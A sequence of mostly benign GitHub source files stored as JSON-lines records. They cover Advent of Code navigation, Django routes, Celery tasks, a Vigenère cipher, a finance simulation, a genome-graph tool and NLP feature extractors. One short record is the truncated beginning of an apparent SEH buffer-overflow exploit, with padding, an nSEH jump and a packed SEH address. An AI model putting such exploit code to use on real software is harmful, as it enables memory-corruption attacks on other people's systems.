int(instr[1:])\n if instr[0] in ['L','R']:\n if instr[0] == 'L':\n dir += param\n else:\n dir -= param\n dir = dir % 360\n elif instr[0] in ['N','S','E','W']:\n if instr[0] == 'N':\n pos[1] += param\n elif instr[0] == 'S':\n pos[1] -= param\n elif instr[0] == 'E':\n pos[0] += param\n elif instr[0] == 'W':\n pos[0] -= param\n elif instr[0] in ['F']:\n if dir == 0:\n pos[0] += param\n elif dir == 180:\n pos[0] -= param\n elif dir == 90:\n pos[1] += param\n elif dir == 270:\n pos[1] -= param\n else:\n print('Error: unknown direction', dir)\n exit()\n else:\n print('Error: unknown instruction', instr)\n exit()\n return abs(pos[0])+abs(pos[1])\n\ndef part2(data = False):\n if not data:\n data = read_input('input')\n ship_pos = [0,0]\n wayp_pos = [10,1]\n for instr in data:\n param = int(instr[1:])\n if instr[0] in ['L','R']:\n wp = wayp_pos.copy()\n if instr[0] == 'L':\n wayp_pos = rotate_quick(wp, param)\n else:\n wayp_pos = rotate_quick(wp, param, -1)\n elif instr[0] in ['N','S','E','W']:\n if instr[0] == 'N':\n wayp_pos[1] += param\n elif instr[0] == 'S':\n wayp_pos[1] -= param\n elif instr[0] == 'E':\n wayp_pos[0] += param\n elif instr[0] == 'W':\n wayp_pos[0] -= param\n elif instr[0] in ['F']:\n ship_pos[0] += wayp_pos[0] * param\n ship_pos[1] += wayp_pos[1] * param\n else:\n print('Error: unknown instruction', instr)\n exit()\n return abs(ship_pos[0])+abs(ship_pos[1])\n\n\ndef unit_test_p1():\n data = read_input('test_input')\n print(\"Unit test start:\")\n assert part1(data) == 25\n print(\"Test 1 OK\")\n\ndef unit_test_p2():\n data = read_input('test_input')\n print(\"Unit test start:\")\n assert part2(data) == 286\n print(\"Test 1 OK\")\n\nprint(\"** Part one\")\nunit_test_p1()\nprint(\"My solution is: \", part1(), \"\\n\")\n\nprint(\"** Part two\")\nunit_test_p2()\nprint(\"My solution is:\", part2(), \"\\n\")\ndata = read_input('input')\n","repo_name":"tomluvoe/adventofcode2020","sub_path":"day12/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69919195367","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom c_index.views import *\nfrom . import views\n\nurlpatterns = [\n url(r'^index/$',views.index),\n url(r'^list/(?P\\d*)$',views.list_category),\n url(r'^list/(?P[0-9]+)/$',views.list_category),\n url(r'^user_center_info/$',views.user_center_info),\n url(r'^user_center_info_handle/$',views.user_center_info_handle),\n url(r'^user_changepwd/$',views.user_changepwd),\n url(r'^changepwd_handle/',views.changepwd_handle),\n url(r'^logout/$',views.logout),\n url(r'^detail/(?P[0-9a-zA-Z\\-]+)/$',views.goodinfo),\n url(r'^search/', MySearchView()),\n]","repo_name":"Justinzhao666/OrderManagementSystem","sub_path":"c_index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31077549756","text":"import copy\nimport logging\nimport os\n\nfrom celery import Celery\n# noinspection PyProtectedMember\nfrom celery import Task\n\nfrom django.conf import settings\n\nfrom fleio.activitylog.utils.functions import current_activity_id\nfrom fleio.activitylog.utils.functions import end_current_activity\nfrom fleio.activitylog.utils.functions import set_current_activity_if_none\n\nfrom fleio.base_settings import TASK_LOG_DIR\n\nCURRENT_TASK_ID = None\nLOG = logging.getLogger(__name__)\nENABLE_TASK_LOGGING = True\n\n\nclass FleioTask(Task):\n abstract = True\n\n def __init__(self):\n self.typing = False\n\n def run(self, *args, **kwargs):\n pass\n\n def delay(self, *args, **kwargs):\n global CURRENT_TASK_ID\n return super().delay(\n *args, **kwargs, parent_task_id=CURRENT_TASK_ID,\n activity_log_id=current_activity_id(),\n )\n\n def si(self, *args, **kwargs):\n global CURRENT_TASK_ID\n return super().si(\n *args, **kwargs, parent_task_id=CURRENT_TASK_ID,\n activity_log_id=current_activity_id(),\n )\n\n def s(self, *args, **kwargs):\n global CURRENT_TASK_ID\n return super().s(\n *args, **kwargs, parent_task_id=CURRENT_TASK_ID,\n activity_log_id=current_activity_id(),\n )\n\n def __call__(self, *args, **kwargs):\n if not self.request.id:\n # we do not have task id, this happens when task is invoked directly\n # we do not log anything here at the moment since this is just a normal function call\n return super().__call__(*args, **kwargs)\n\n global CURRENT_TASK_ID\n old_task_id = CURRENT_TASK_ID\n CURRENT_TASK_ID = self.request.id\n\n task_kwargs = copy.deepcopy(kwargs)\n\n if 'parent_task_id' in task_kwargs:\n self.parent_task_id = task_kwargs.pop('parent_task_id')\n else:\n LOG.error('Parent task id is not present in task parameters !!!')\n\n must_end_activity = False\n if 'activity_log_id' in task_kwargs:\n self.activity_log_id = task_kwargs.pop('activity_log_id')\n must_end_activity = set_current_activity_if_none(activity_id=self.activity_log_id)\n\n if ENABLE_TASK_LOGGING:\n # set custom log handler to capture task logs\n formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')\n task_handler = logging.FileHandler(os.path.join(settings.TASK_LOG_DIR, CURRENT_TASK_ID + '.log'))\n task_handler.setFormatter(formatter)\n task_handler.setLevel(logging.DEBUG)\n logging.root.addHandler(task_handler)\n\n try:\n # actual task execution\n task_result = super().__call__(*args, **task_kwargs)\n finally:\n if ENABLE_TASK_LOGGING:\n # remove log handler\n # noinspection PyUnboundLocalVariable\n logging.root.removeHandler(task_handler)\n task_handler.flush()\n task_handler.close()\n\n if must_end_activity:\n end_current_activity(activity_id=self.activity_log_id)\n\n CURRENT_TASK_ID = old_task_id\n\n return task_result\n\n\nclass FleioCelery(Celery):\n task_cls = FleioTask\n\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'fleio.settings')\n\ntry:\n if not os.path.isdir(TASK_LOG_DIR):\n parent_dir = os.path.dirname(TASK_LOG_DIR)\n parent_stat = os.stat(parent_dir)\n\n os.mkdir(TASK_LOG_DIR, 0o755)\n stats = os.stat(TASK_LOG_DIR)\n if stats.st_uid != parent_stat.st_uid:\n os.chown(TASK_LOG_DIR, parent_stat.st_uid, parent_stat.st_gid)\nexcept Exception as e:\n del e # unused\n LOG.exception('Failed to create tasklog directory, disabling task logging')\n ENABLE_TASK_LOGGING = False\n\n\napp = FleioCelery('fleio')\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\napp.autodiscover_tasks()\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print('Request: {0!r}'.format(self.request)) # noqa\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/fleio/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40982003367","text":"def encript(plainText,key):\n encryption=\"\"\n s=0\n for i in range(0,len(plainText)):\n encryption+=chr((((ord(plainText[i])-65) + (ord(key[s])-65))%26)+65)\n s=(s+1)%len(key)\n\n return encryption\n\ndef decrypher(cipherText,key):\n decryption=\"\"\n s=0\n for i in range(0,len(cipherText)):\n decryption+=chr((((ord(cipherText[i])-65) - (ord(key[s])-65)+26)%26)+65)\n s=(s+1)%len(key)\n\n return decryption\n\n\nprint(\"\\n Vigere Cipher\\n\")\nprint()\nbegin=1\nwhile(begin==1):\n print(\" Options: \\n 0. To close the program.\\n 1. To encrypt\\n 2. To decrypt\\n Enter value: \", end=\"\")\n instruction=input()\n if(instruction=='1'):\n print(\" Enter the key word in CAPITAL LETTER: \", end=\"\")\n key=input()\n print(\" Enter the phrase to encrypt in CAPITAL LETTER: \", end=\"\")\n plainText=input()\n print(\" Your Decryption was: \",encript(plainText,key))\n else:\n if(instruction=='2'):\n print(\" Enter the key word in CAPITAL LETTER: \", end=\"\")\n key=input()\n print(\" Enter the phrase to encrypt in CAPITAL LETTER: \", end=\"\")\n encryptText=input()\n print(\" Your Decryption was: \",decrypher(encryptText,key))\n else: begin=0\n print(\"\\n Press enter to continue...\")\n input()\n\n\n#cipherText=encript(\"ESTAESUNACARTAPARATODALAGENTEQUEMEQUIERESEPUTOESTO\",\"RELATIONS\")\n#plainText=decrypher(cipherText,\"RELATIONS\")\n#print(cipherText)\n#print(plainText)","repo_name":"adchavesm/Cryptography","sub_path":"VigereCypher.py","file_name":"VigereCypher.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37358428108","text":"import h5py\nimport numpy as np\n\n# initialize file\nf = h5py.File(output_folder + \"mytestfile.hdf5\", \"w\") # 'w' is write mode\n# store data in the file\nf.create_dataset(\"data_name\", data=data_np_array)\nf.close()\n\n# read file\nf = h5py.File(output_folder + \"mytestfile.hdf5\", 'r') # 'r' means that hdf5 file is open in read-only mode\ndat = f[\"data_name\"][:] # reads data as np ndarray\nf.close()","repo_name":"wuxiaotiankevin/DataScienceToolbox","sub_path":"between_python_R/read_write_hdf5.py","file_name":"read_write_hdf5.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31313831397","text":"import sys, pdb\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\n\nfrom dx import *\n\nPATH = '/home/ubuntu/workspace/python_for_finance/png/book_examples/dx/'\n\ndef derivatives_sim():\n me_gbm = market_environment('me_gbm', dt.datetime(2015, 1, 1))\n me_gbm.add_constant('initial_value', 36.)\n me_gbm.add_constant('volatility', 0.2)\n me_gbm.add_constant('currency', 'EUR')\n me_gbm.add_constant('model', 'gbm')\n me_am_put = market_environment('me_am_put', dt.datetime(2015, 1, 1))\n me_am_put.add_constant('maturity', dt.datetime(2015, 12, 31))\n me_am_put.add_constant('strike', 40.)\n me_am_put.add_constant('currency', 'EUR')\n payoff_func = 'np.maximum(strike - instrument_values, 0)'\n am_put_pos = derivatives_position(\n name='am_put_pos',\n quantity=3,\n underlyings=['gbm'],\n mar_env=me_am_put,\n otype='American single',\n payoff_func=payoff_func)\n am_put_pos.get_info()\n me_jd = market_environment('me_jd', me_gbm.pricing_date)\n \n # add jump diffusion specific parameters\n me_jd.add_constant('lambda', 0.3)\n me_jd.add_constant('mu', -0.75)\n me_jd.add_constant('delta', 0.1)\n \n # add other parameters from gbm\n me_jd.add_environment(me_gbm)\n\n # needed for portfolio valuation\n me_jd.add_constant('model', 'jd')\n me_eur_call = market_environment('me_eur_call', me_jd.pricing_date)\n me_eur_call.add_constant('maturity', dt.datetime(2015, 6, 30))\n me_eur_call.add_constant('strike', 38.)\n me_eur_call.add_constant('currency', 'EUR')\n payoff_func = 'np.maximum(maturity_value - strike, 0)'\n eur_call_pos = derivatives_position(\n name='eur_call_pos',\n quantity=5,\n underlyings=['jd'],\n mar_env=me_eur_call,\n otype='European single',\n payoff_func=payoff_func)\n underlyings = {'gbm': me_gbm, 'jd' : me_jd}\n positions = {'am_put_pos' : am_put_pos, 'eur_call_pos' : eur_call_pos}\n\n # discounting object for the valuation\n csr = constant_short_rate('csr', 0.06)\n val_env = market_environment('general', me_gbm.pricing_date)\n val_env.add_constant('frequency', 'W')\n \n # monthly frequency\n val_env.add_constant('paths', 2500)\n val_env.add_constant('starting_date', val_env.pricing_date)\n val_env.add_constant('final_date', val_env.pricing_date)\n \n # not yet known; take pricing_date temporarily\n val_env.add_curve('discount_curve', csr)\n # select single discount_curve for whole portfolio\n pdb.set_trace()\n portfolio = derivatives_portfolio(\n name='portfolio',\n positions=positions,\n val_env=val_env,\n risk_factors=underlyings,\n fixed_seed=False)\n portfolio.get_statistics(fixed_seed=False)\n portfolio.get_statistics(fixed_seed=False)[['pos_value', 'pos_delta', 'pos_vega']].sum()\n \n # aggregate over all positions\n # portfolio.get_positions()\n \n print(portfolio.valuation_objects['am_put_pos'].present_value())\n print(portfolio.valuation_objects['eur_call_pos'].delta())\n path_no = 777\n path_gbm = portfolio.underlying_objects['gbm'].get_instrument_values()[:, path_no]\n path_jd = portfolio.underlying_objects['jd'].get_instrument_values()[:, path_no]\n\n plt.figure(figsize=(7, 4))\n plt.plot(portfolio.time_grid, path_gbm, 'r', label='gbm')\n plt.plot(portfolio.time_grid, path_jd, 'b', label='jd')\n plt.xticks(rotation=30)\n plt.legend(loc=0); plt.grid(True)\n plt.savefig(PATH + 'dx_port.png', dpi=300)\n plt.close()\n\n correlations = [['gbm', 'jd', 0.9]]\n port_corr = derivatives_portfolio(\n name='portfolio',\n positions=positions,\n val_env=val_env,\n risk_factors=underlyings,\n correlations=correlations,\n fixed_seed=True)\n print(port_corr.get_statistics())\n path_gbm = port_corr.underlying_objects['gbm'].\\\n get_instrument_values()[:, path_no]\n path_jd = port_corr.underlying_objects['jd'].\\\n get_instrument_values()[:, path_no]\n\n plt.figure(figsize=(7, 4))\n plt.plot(portfolio.time_grid, path_gbm, 'r', label='gbm')\n plt.plot(portfolio.time_grid, path_jd, 'b', label='jd')\n plt.xticks(rotation=30)\n plt.legend(loc=0); plt.grid(True)\n plt.savefig(PATH + 'dx_port2.png', dpi=300)\n plt.close()\n\n pv1 = 5 * port_corr.valuation_objects['eur_call_pos'].\\\n present_value(full=True)[1]\n print(pv1)\n pv2 = 3 * port_corr.valuation_objects['am_put_pos'].\\\n present_value(full=True)[1]\n print(pv2)\n plt.hist([pv1, pv2], bins=25,\n label=['European call', 'American put']);\n plt.axvline(pv1.mean(), color='r', ls='dashed',\n lw=1.5, label='call mean = %4.2f' % pv1.mean())\n plt.axvline(pv2.mean(), color='r', ls='dotted',\n lw=1.5, label='put mean = %4.2f' % pv2.mean())\n plt.xlim(0, 80); plt.ylim(0, 10000)\n plt.legend()\n plt.savefig(PATH + 'dx_port3.png', dpi=300)\n plt.close()\n\n pvs = pv1 + pv2\n plt.hist(pvs, bins=50, label='portfolio');\n plt.axvline(pvs.mean(), color='r', ls='dashed',\n lw=1.5, label='mean = %4.2f' % pvs.mean())\n plt.xlim(0, 80); plt.ylim(0, 7000)\n plt.legend()\n plt.savefig(PATH + 'dx_port4.png', dpi=300)\n plt.close()\n\n # portfolio with correlation\n print(pvs.std())\n # portfolio without correlation\n pv1 = 5 * portfolio.valuation_objects['eur_call_pos'].\\\n present_value(full=True)[1]\n pv2 = 3 * portfolio.valuation_objects['am_put_pos'].\\\n present_value(full=True)[1]\n print((pv1 + pv2).std())\n\nif __name__ == '__main__': \n derivatives_sim()","repo_name":"mccarvik/python_for_finance","sub_path":"books/python_for_finance_book/ch_scraps/18ch_scrap.py","file_name":"18ch_scrap.py","file_ext":"py","file_size_in_byte":5981,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34179991362","text":"#!/usr/bin/env python\n# Don't run tests from the root repo dir.\n# We want to ensure we're importing from the installed\n# binary package not from the CWD.\n\nimport os\nfrom subprocess import check_call\n\n_dname = os.path.dirname\n\nREPO_ROOT = _dname(_dname(os.path.abspath(__file__)))\nos.chdir(os.path.join(REPO_ROOT))\n\ntcmn = 'py.test tests --cov=pubnub --ignore=tests/manual/'\nfcmn = 'flake8 --exclude=scripts/,src/,.cache,.git,.idea,.tox,._trial_temp/,venv/ --ignore F811,E402'\n\n\ndef run(command):\n return check_call(command, shell=True)\n\n\nrun(tcmn)\n# moved to separate action\n# run(fcmn)\n","repo_name":"pubnub/python","sub_path":"scripts/run-tests.py","file_name":"run-tests.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"53"} +{"seq_id":"5982351499","text":"#!/usr/bin/env python3\n\"\"\"\nA script to merge a single GFF file with a pre-existing panaroo output\n\"\"\"\n\nimport os\nimport tempfile\nimport networkx as nx\nimport shutil\nimport sys\nimport subprocess\n\nfrom .__init__ import __version__\nfrom .prokka import process_prokka_input\nfrom .cdhit import run_cdhit\nfrom .generate_network import generate_network\nfrom .isvalid import *\nfrom .merge_graphs import merge_graphs\n\n\ndef get_options(\n): #options for integrating (combination of merge graph and cdhit options\n\n import argparse\n\n description = 'Integrate new gff file into pre-existing graph'\n parser = argparse.ArgumentParser(description=description,\n prog='panaroo_integrate')\n\n io_opts = parser.add_argument_group('Input/output')\n\n io_opts.add_argument(\n \"-d\",\n \"--input_dir\",\n dest=\"input_dir\",\n required=True,\n help=\"input directory for gml of pre-existing panaroo output\",\n type=str)\n\n io_opts.add_argument(\"-i\",\n \"--input_gff\",\n dest=\"input_gff\",\n required=True,\n help=\"input gff file of new genome to be integrated\",\n type=str)\n\n io_opts.add_argument(\"-o\",\n \"--out_dir\",\n dest=\"output_dir\",\n required=True,\n help=\"location of a new output directory\",\n type=str)\n \n io_opts.add_argument(\n \"--remove-invalid-genes\",\n dest=\"filter_invalid\",\n action='store_true',\n default=False,\n help=(\n \"removes annotations that do not conform to the expected Prokka\" +\n \" format such as those including premature stop codons.\"))\n\n matching = parser.add_argument_group('Matching')\n\n matching.add_argument(\"-c\",\n \"--threshold\",\n dest=\"id\",\n help=\"sequence identity threshold (default=0.95)\",\n default=0.98,\n type=float)\n\n matching.add_argument(\n \"-f\",\n \"--family_threshold\",\n dest=\"family_threshold\",\n help=\"protein family sequence identity threshold (default=0.7)\",\n default=0.7,\n type=float)\n\n matching.add_argument(\"--len_dif_percent\",\n dest=\"len_dif_percent\",\n help=\"length difference cutoff (default=0.95)\",\n default=0.95,\n type=float)\n\n matching.add_argument(\"--merge_paralogs\",\n dest=\"merge_paralogs\",\n help=\"don't split paralogs\",\n action='store_true',\n default=False)\n\n matching.add_argument(\n \"--length_outlier_support_proportion\",\n dest=\"length_outlier_support_proportion\",\n help=\n (\"proportion of genomes supporting a gene with a length more \" +\n \"than 1.5x outside the interquatile range for genes in the same cluster\"\n +\n \" (default=0.01). Genes failing this test will be re-annotated at the \"\n + \"shorter length\"),\n type=float,\n default=0.1)\n\n parser.add_argument(\n \"--min_edge_support_sv\",\n dest=\"min_edge_support_sv\",\n help=(\n \"minimum edge support required to call structural variants\" +\n \" in the presence/absence csv file (default=max(2, 0.01*n_samples))\"\n ),\n default=2,\n type=int)\n\n # MSA options\n core = parser.add_argument_group('Gene alignment')\n core.add_argument(\n \"-a\",\n \"--alignment\",\n dest=\"aln\",\n help=(\"Output alignments of core genes or all genes. Options are\" +\n \" 'core' and 'pan'. Default: 'None'\"),\n type=str,\n choices=['core', 'pan'],\n default=None)\n\n core.add_argument(\n \"--aligner\",\n dest=\"alr\",\n help=\n \"Specify an aligner. Options:'prank', 'clustal', and default: 'mafft'\",\n type=str,\n choices=['prank', 'clustal', 'mafft'],\n default=\"mafft\")\n\n core.add_argument(\"--core_threshold\",\n dest=\"core\",\n help=\"Core-genome sample threshold (default=0.95)\",\n type=float,\n default=0.95)\n\n core.add_argument(\"--core_entropy_filter\",\n dest=\"hc_threshold\",\n help=(\"Manually set the Block Mapping and Gathering with \" +\n \"Entropy (BMGE) filter. Can be between 0.0 and 1.0. By \" + \n \"default this is set using the Tukey outlier method.\"),\n type=float,\n default=None)\n\n graph = parser.add_argument_group('Graph correction')\n\n graph.add_argument(\n \"--all_seq_in_graph\",\n dest=\"all_seq_in_graph\",\n help=(\"Retains all DNA sequence for each gene cluster in the graph \" +\n \"output. Off by default as it uses a large amount of space.\"),\n action='store_true',\n default=False)\n\n # Other options\n parser.add_argument(\"-t\",\n \"--threads\",\n dest=\"n_cpu\",\n help=\"number of threads to use (default=1)\",\n type=int,\n default=1)\n parser.add_argument(\"--codon-table\",\n dest=\"table\",\n help=\"the codon table to use for translation (default=11)\",\n type=int,\n default=11)\n parser.add_argument(\"--quiet\",\n dest=\"quiet\",\n help=\"suppress additional output\",\n action='store_true',\n default=False)\n\n parser.add_argument(\n \"--dirty\",\n dest=\"dirty\",\n help=\n \"keep temporary directory containing cluster files and cdhit output\",\n action='store_true',\n default=False)\n\n parser.add_argument(\"--version'\",\n action=\"version\",\n version='%(prog)s ' + __version__)\n\n args = parser.parse_args()\n\n return (args)\n\n\ndef replace_all(text, dic):\n for i, j in dic.items():\n text = text.replace(i, j)\n return text\n\n\ndef reformat_network(single_gml, output_dir, isolateName):\n \"\"\"Reformats the output of generate_network() for linear graphs to allow input into merge_graphs()\"\"\"\n for adj in single_gml._adj:\n for x in single_gml._adj[adj]:\n y = single_gml._adj[adj][x]\n\n y.pop('members')\n zero = {'members': 0}\n y.update(zero)\n\n genomes = {'genomeIDs': '0'}\n y.update(genomes)\n\n for node in single_gml._node:\n y = single_gml._node[node]\n y.pop('members')\n\n zero = {\n 'members': 0\n } #members are assigned intbitset[0]. needs to be 0\n y.update(zero)\n\n to_replace = {\"[\": \"\", \"]\": \"\", \"'\": \"\"}\n y['centroid'] = replace_all(str(y['centroid']), to_replace)\n y['dna'] = replace_all(str(y['dna']), to_replace)\n y['protein'] = replace_all(str(y['protein']), to_replace)\n\n y['hasEnd'] = int(y['hasEnd'])\n y['mergedDNA'] = int(y['mergedDNA'])\n y['paralog'] = int(y['paralog'])\n\n y['longCentroidID'] = list(y['longCentroidID'])\n y['seqIDs'] = list(y['seqIDs'])\n\n single_gml.graph.update({'isolateNames':\n 'x'}) # isolateName from gff filename\n nx.write_gml(single_gml, output_dir + \"final_graph.gml\")\n\n return single_gml\n\n\ndef main():\n #Takes a single GFF input, generates a graph and merges with a pre-existing graph\n args = get_options()\n\n # create directory if it isn't present already\n if not os.path.exists(args.output_dir):\n os.mkdir(args.output_dir)\n\n args.input_dir = os.path.join(args.input_dir, \"\")\n args.output_dir = os.path.join(args.output_dir, \"\")\n\n # Create temporary directory\n temp_dir = os.path.join(tempfile.mkdtemp(dir=args.output_dir), \"\")\n\n directories = [args.input_dir, temp_dir]\n\n gff_file = [args.input_gff]\n\n filename = os.path.basename(args.input_gff).split(\".\")[0]\n\n if not args.quiet: print(\"Processing input\")\n process_prokka_input(gff_list=gff_file,\n output_dir=temp_dir,\n filter_seqs=args.filter_invalid,\n quiet=args.quiet,\n n_cpu=args.n_cpu,\n table=args.table)\n\n cd_hit_out = temp_dir + \"combined_protein_cdhit_out.txt\"\n\n run_cdhit(input_file=temp_dir + \"combined_protein_CDS.fasta\",\n output_file=cd_hit_out,\n id=args.id,\n quiet=args.quiet,\n n_cpu=args.n_cpu)\n\n if not args.quiet: print(\"Generating network\")\n single_gml, centroid_contexts_single, seqid_to_centroid_single = generate_network(\n cluster_file=cd_hit_out + \".clstr\",\n data_file=temp_dir + \"gene_data.csv\",\n prot_seq_file=temp_dir + \"combined_protein_CDS.fasta\",\n all_dna=args.all_seq_in_graph)\n\n if not args.quiet: print(\"Reformatting network\")\n reformat_network(single_gml=single_gml,\n output_dir=temp_dir,\n isolateName=filename)\n\n merge_graphs(directories=directories,\n temp_dir=temp_dir,\n len_dif_percent=args.len_dif_percent,\n pid=args.id,\n family_threshold=args.family_threshold,\n length_outlier_support_proportion=args.\n length_outlier_support_proportion,\n merge_para=args.merge_paralogs,\n output_dir=args.output_dir,\n min_edge_support_sv=args.min_edge_support_sv,\n aln=args.aln,\n alr=args.alr,\n core=args.core,\n hc_threshold=args.hc_threshold,\n merge_single=True,\n depths=[1],\n n_cpu=args.n_cpu,\n quiet=args.quiet)\n\n G = nx.read_gml(args.output_dir + \"final_graph.gml\")\n\n for index, name in enumerate(\n G.graph['isolateNames']\n ): #Corrects isolate name for single gff being returned as list\n if name == 'x':\n G.graph['isolateNames'][index] = filename\n\n nx.write_gml(G, args.output_dir + \"final_graph.gml\")\n\n #remove temporary directory if dirty = True\n if not args.dirty:\n shutil.rmtree(temp_dir)\n\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gtonkinhill/panaroo","sub_path":"panaroo/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":10732,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"53"} +{"seq_id":"27991823968","text":"'''\nCreated on Mar 20, 2015\n\n@author: Marc Lopez (marc.rainier.lopez@gmail.com)\n'''\n\nfrom pytest import raises # @UnresolvedImport\nfrom mock import ANY\n\nfrom .mocks import ProcessUtilityMock\n\nfrom processwrapper import ProcessWrapper\n\n\nclass TestProcessWrapper:\n\n def setup_method(self, method):\n self.process_wrapper = ProcessWrapper(ProcessUtilityMock())\n self.process_utility = self.process_wrapper.process_utility\n self.sample_command = 'background_process run'\n self.SampleException = BaseException\n\n def teardown_method(self, method):\n self.process_utility.kill_process_group_mock.assert_any_call(ANY)\n\n def test__process_wrapper__kills_parent_and_child_processes_on_exit(self):\n with self.process_wrapper.run_process(self.sample_command):\n self.process_utility.request_new_process_mock.assert_any_call(\n self.sample_command)\n\n def test__process_wrapper__handles_in_context_exceptions(self):\n with raises(self.SampleException):\n with self.process_wrapper.run_process(self.sample_command):\n raise self.SampleException\n\n def test__process_wrapper__does_nothing_with_already_killed_procs(self):\n self.process_utility.kill_process_group_mock.side_effect = \\\n self.process_utility.ProcessDoesNotExist\n\n try:\n with self.process_wrapper.run_process(self.sample_command):\n pass\n except:\n fail_msg = 'Exception raised when it should not'\n raise AssertionError(fail_msg)\n\n def test__process_wrapper__raises_all_other_exceptions(self):\n self.process_utility.kill_process_group_mock.side_effect = \\\n self.SampleException\n\n with raises(self.SampleException):\n with self.process_wrapper.run_process(self.sample_command):\n pass\n\n\ndef test__sample_usage__works():\n import time\n from psutil import Process\n from processwrapper import run_process\n\n with run_process(\n 'python bin/sample_background_process.py parent') as process:\n sample_process = Process(process.pid)\n assert sample_process.is_running()\n time.sleep(2)\n\n assert not sample_process.is_running()\n","repo_name":"marc-lopez/process-wrapper","sub_path":"ProcessWrapper/processwrapper/tests/test_process_wrapper.py","file_name":"test_process_wrapper.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39122632286","text":"import base64, struct\n\nhead = \"A\" * 1024\nnseh = \"\\x41\\x41\\xeb\\x0c\" # filler 0x41, 0xeb 0x0c = jmp few bytes only\nseh = struct.pack(\" List[int]:\n \"\"\"\n Extract features from a sentence represented as a list of words. Includes a flag add_to_indexer to\n :param sentence: words in the example to featurize\n :param add_to_indexer: True if we should grow the dimensionality of the featurizer if new features are encountered.\n At test time, any unseen features should be discarded, but at train time, we probably want to keep growing it.\n :return: A feature vector. We suggest using a Counter[int], which can encode a sparse feature vector (only\n a few indices have nonzero value) in essentially the same way as a map. However, you can use whatever data\n structure you prefer, since this does not interact with the framework code.\n \"\"\"\n raise Exception(\"Don't call me, call my subclasses\")\n \nclass UnigramFeatureExtractor(FeatureExtractor):\n \"\"\"\n Extracts unigram bag-of-words features from a sentence. It's up to you to decide how you want to handle counts\n and any additional preprocessing you want to do.\n \"\"\"\n #you could add new properties\n def __init__(self, indexer: Indexer):\n #FeatureExtractor.__init__(self)\n self.indexer = indexer\n\n def get_indexer(self): \n return self.indexer\n \n def add_features(self, sentence: List[str]):\n words = []\n for word in sentence: \n word = word.lower()\n if word not in words: \n self.indexer.add_and_get_index(word)\n\n def extract_features(self, sentence: List[str], add_to_indexer: bool= False) -> List[int]: \n if add_to_indexer: \n self.add_features(sentence)\n count = Counter()\n for word in sentence: \n word = word.lower()\n if self.indexer.contains(word): \n index = self.indexer.index_of(word)\n count.update([index]) \n \n return list(count.items())\n \n def vocab_size(self): \n return len(self.indexer)\n\n\nclass BigramFeatureExtractor(FeatureExtractor):\n \"\"\"\n Bigram feature extractor analogous to the unigram one.\n \"\"\"\n def __init__(self, indexer: Indexer):\n self.indexer = indexer\n \n def get_indexer(self): \n return self.indexer\n\n def add_features(self, sentence: List[str]): \n for i in range(len(sentence)-1): \n word_pair = sentence[i].lower() + sentence[i+1].lower()\n self.indexer.add_and_get_index(word_pair)\n\n def extract_features(self, sentence:List[str], add_to_indexer: bool=False)-> List[int]: \n if add_to_indexer: \n self.add_features(sentence)\n count = Counter()\n words = []\n # for word in sentence: \n # if word not in string.punctuation: \n # words.append(word) \n\n for i in range(len(sentence)-1): \n word_pair = sentence[i].lower() + sentence[i+1].lower()\n \n if self.indexer.contains(word_pair): \n index = self.indexer.index_of(word_pair)\n count.update([index])\n\n return list(count.items())\n \n def vocab_size(self): \n return len(self.indexer)\n\nclass BetterFeatureExtractor(FeatureExtractor):\n \"\"\"\n Better feature extractor...try whatever you can think of!\n \"\"\"\n def __init__(self, indexer: Indexer):\n #raise Exception(\"Must be implemented\")\n #FeatureExtractor.__init__(self)\n self.indexer = indexer\n \n def get_indexer(self): \n return self.indexer\n \n def add_features(self, sentence: List[str]): \n #remove punctation and stop words\n words = []\n stop_words = set(stopwords.words('english')) \n for word in sentence: \n if word not in string.punctuation: \n word = word.lower()\n words.append(word)\n \n non_stop_words = [w for w in words if not w in stop_words]\n for feature in non_stop_words: \n self.indexer.add_and_get_index(feature)\n \n def extract_features(self, sentence: List[str], add_to_indexer: bool= False)-> List[int]: \n count = Counter()\n if add_to_indexer: \n self.add_features(sentence)\n for word in sentence: \n word = word.lower()\n if self.indexer.contains(word): \n index = self.indexer.index_of(word)\n count.update([index]) \n \n return list(count.items())\n\n def vocab_size(self): \n return len(self.indexer)\n\nclass SentimentClassifier(object):\n \"\"\"\n Sentiment classifier base type\n \"\"\"\n def predict(self, sentence: List[str]) -> int:\n \"\"\"\n :param sentence: words (List[str]) in the sentence to classify\n :return: Either 0 for negative class or 1 for positive class\n \"\"\"\n raise Exception(\"Don't call me, call my subclasses\")\n\n\nclass TrivialSentimentClassifier(SentimentClassifier):\n 